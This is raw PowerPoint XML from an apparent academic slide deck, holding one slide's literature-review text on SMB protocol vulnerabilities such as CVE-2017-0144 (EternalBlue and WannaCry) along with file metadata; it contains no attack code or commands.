                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Numerous studies and security advisories have documented the vulnerabilities in the SMB protocol. The National Vulnerability Database (NVD) provides extensive records of SMB-related vulnerabilities, highlighting the protocol's susceptibility to attacks. For example, [Author/Source, Year] detailed vulnerabilities such as CVE-2017-0144, famously exploited by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> exploit. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, developed by the NSA and later leaked by the Shadow Brokers, targets the SMBv1 protocol and has been utilized in major cyber attacks, including the WannaCry ransomware outbreak.</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1683</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>182</Paragraphs>
  <Slides>35</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ADLaM Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Avenir Next</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Shiva Radharapu</cp:lastModifiedBy>
  <cp:revision>932</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-27T04:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-27T08:57:07Z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AD3BAC872FFA462CA41DB37D06C50C27_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.17119</vt:lpwstr>
  </property>
</Properties>
</file>